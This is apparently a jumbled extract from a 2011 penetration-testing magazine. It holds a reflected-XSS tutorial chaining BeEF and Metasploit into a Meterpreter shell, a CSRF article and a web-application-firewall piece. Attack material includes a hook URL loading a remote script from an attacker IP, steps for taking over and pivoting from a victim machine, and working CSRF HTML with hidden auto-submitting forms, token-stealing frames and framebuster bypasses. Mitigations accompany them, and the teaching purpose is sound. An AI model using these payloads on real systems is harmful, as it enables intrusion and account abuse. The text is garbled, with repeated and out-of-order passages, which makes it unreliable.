There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser
Figure 8. Starting Metasploit
Figure 9. The jobs command
Figure 10. Metasploit after clicking Send Now
Figure 11. Meterpreter window - screenshot 1
Figure 12. Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the selected exploit (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools (Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit) and install them on this machine. We can then use these to port-scan an entire internal network or search for vulnerabilities in other services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output from the first point must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for this.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
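To illustrate the encoding step, a minimal HTML entity encoder might look like the sketch below. This is only an illustration of the cheat sheet's basic rule; production code should use a vetted encoding library rather than a hand-rolled function:

```javascript
// Minimal HTML entity encoding for untrusted output before it is
// reflected into a page. Ampersand must be replaced first so that
// already-encoded entities are not produced out of order.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// The reflected search parameter from the earlier example becomes inert text:
console.log(escapeHtml('<script>alert(document.domain)</script>'));
// → &lt;script&gt;alert(document.domain)&lt;/script&gt;
```

With this applied to the echoed search parameter, the payload is displayed as text instead of executing.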
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and Web application penetration testing. In addition, he freelances in information security audits, trainings and product development (Perl, Ruby on Rails), while spending a lot of time learning more about malware analysis and reverse engineering.
Email: arvinddoraiswamy@gmail.com
LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings: http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are weak defenses:
• Only accept POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: some users prohibit referrers, so you cannot simply require Referer headers; techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can simply perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from a CAPTCHA image every time he submits a form might make him stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of an authorized user.
Listing 1. HTML code used to bypass the protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like
www.evil.com" />
<input type="submit" />
</form>
<script>document.Form.submit();</script>
</div>
index.php (Victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (Evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:
Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value;
Browser settings are not hard to modify, so the best approach to web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is to use FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed.
<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>
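The logic of this check can be modeled as a small pure function and exercised against mock window objects. This is illustrative only; a real FrameKiller runs against the browser's own window:

```javascript
// Illustrative sketch: model the framekiller condition with mock window
// objects so the logic can be tested outside a browser.
function isFramed(win) {
  // In a browser, win.top !== win.self exactly when the page sits inside a frame.
  return win.top !== win.self;
}

// Mock windows: a top-level page vs. a framed page.
const topLevel = {};
topLevel.top = topLevel;
topLevel.self = topLevel;

const framed = {};
framed.top = {};      // some other (attacker-controlled) window
framed.self = framed;

console.log(isFramed(topLevel)); // false
console.log(isFramed(framed));   // true
```

When the check fires, the counter-action (such as top.location.replace) breaks the page out of the attacker's frame.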
It consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so they can be compared after the form is submitted.
Subverting one-time tokens is usually attempted with brute-force attacks. Brute-forcing one-time tokens is useful only if the same token-generation mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2. index.php (victim website)

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. post.php (victim website)

<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Web developers use different FrameKillers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
  return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2: using double framing

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
  document.documentElement.style.display = 'block';
} else {
  top.location = self.location;
}
</script>

This protects the web application even if an attacker opens the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company, and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF), http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
  var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
  var myForm = document.myForm;
  myForm.token.value = token;
  myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Pages 38-39, http://pentestmag.com, 01/2011 (1), November
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of (and more powerful) applications that provide the internet user with the required functions as quickly and simply as possible.
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all, the common practice of adapting tried and tested technologies for developing web applications, without having subjected them to prior security and qualification tests, is dangerous. In the belief that the existing network firewall would provide the required protection should any weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions the program should master. The subject of security, however, is often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide.
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place, or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not perform any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems that follow on from it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to obtain even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better; instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use more than the session attributes for authentication; in this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots (and the probability is relatively high), then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether, and to what extent, the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory, but actually complement each other. By analogy with air travel, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused via SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing Web Application Security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, the WAF interrupts the data transfer or reacts in a different way predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and contents of parameters can be checked in the same way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value range.
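Such parameter rules can be sketched as a simple request filter. This is an invented illustration of the principle, not any real WAF's API; the rule values are assumptions:

```javascript
// Illustrative WAF-style parameter rules: maximum parameter count,
// maximum value length, and a permitted character set per form.
const rules = {
  maxParams: 2,
  maxLength: 64,
  allowed: /^[\w @.,!?-]*$/, // assumed policy for the permitted value area
};

function checkRequest(params, policy) {
  const names = Object.keys(params);
  if (names.length > policy.maxParams) return false; // e.g. 3+ parameters blocked
  return names.every(function (name) {
    const value = String(params[name]);
    return value.length <= policy.maxLength && policy.allowed.test(value);
  });
}

console.log(checkRequest({ search: 'shoes', Submit: 'Submit' }, rules)); // true
// An injected extra parameter or a <script> payload is rejected:
console.log(checkRequest({ search: '<script>alert(1)</script>', Submit: 'Submit' }, rules)); // false
```

Real WAFs apply such rules per URL and per parameter, typically learned or configured individually, but the blocking decision follows the same shape.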
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML. This protects the web server from typical XML attacks such as nested elements or WSDL poisoning. A fully developed rate-limiting rule set with finely adjustable guidelines also mitigates the consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is passed on to the web application.
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Pages 42-43, http://pentestmag.com, 01/2011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not conduct sufficient checks on the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; whitelist-only profiles quickly become out of date due to the constant tuning they require. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard applications like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
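The combination described above can be sketched as follows (a simplified JavaScript illustration; the paths, parameter names and patterns are invented for the example and are not the rule syntax of any real WAF):

```javascript
// Sketch: a blacklist of known attack patterns applied everywhere,
// plus a strict whitelist for one high-value page. All rules are illustrative.
const blacklist = [/<script/i, /union\s+select/i, /\.\.\//];
const whitelists = {
  "/order/entry": { qty: /^\d{1,3}$/, sku: /^[A-Z]{2}\d{4}$/ },
};

function inspect(path, query) {
  const wl = whitelists[path];
  if (wl) {
    // positive security model: every parameter must match its profile
    return Object.entries(query).every(([k, v]) => Boolean(wl[k]) && wl[k].test(v));
  }
  // negative security model: reject anything matching a known attack pattern
  return Object.values(query).every((v) => !blacklist.some((re) => re.test(v)));
}
```

The high-value order entry page gets the strict positive model, while the rest of the site falls back to the less maintenance-intensive negative model.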
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even after the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode, and certain special functions are only available in this mode. As a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With proxy WAFs, SSL is much faster, and the response times of the web application can also be improved. They also facilitate cloaking techniques, Layer 7 rules (to mitigate Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But proxy WAFs must also be configured according to the respective requirements; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible exfiltration of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include, in particular, identity and access management. In this context the principle of least privilege applies: users are only awarded those privileges they need for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions are intuitive, clearly displayed, easy to understand and easy to set, this in practice makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on the known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue:
• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.

Available to download on December 22nd
WEB APP VULNERABILITIES
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of the user clicking on a link which generates a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box appearing on the victim machine. Here's a screenshot which shows the same (Figure 4), and this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code
<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, his input is sent to the server, which reads the value of the parameter and prints it to the screen. If instead of simple text the attacker enters a JavaScript snippet into the box, the JavaScript will execute on the user's machine rather than be displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1)
BeEF – Hook the user's browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now, though, extract BeEF from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What the attacker will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the DEFACE STRING box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF under the Standard Modules and Browser Modules tabs which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7 Detecting plugins on the user's browser
Figure 8 Starting Metasploit
Figure 9 The jobs command
Figure 10 Metasploit after clicking Send Now
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point in time we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install them on this machine. We can then use these to port-scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13 Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output identified in the first step must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for this.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
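The encoding step can be sketched as follows (a minimal JavaScript helper in the spirit of the OWASP cheat sheet; it is illustrative only and not a complete sanitizer, and the function name is my own):

```javascript
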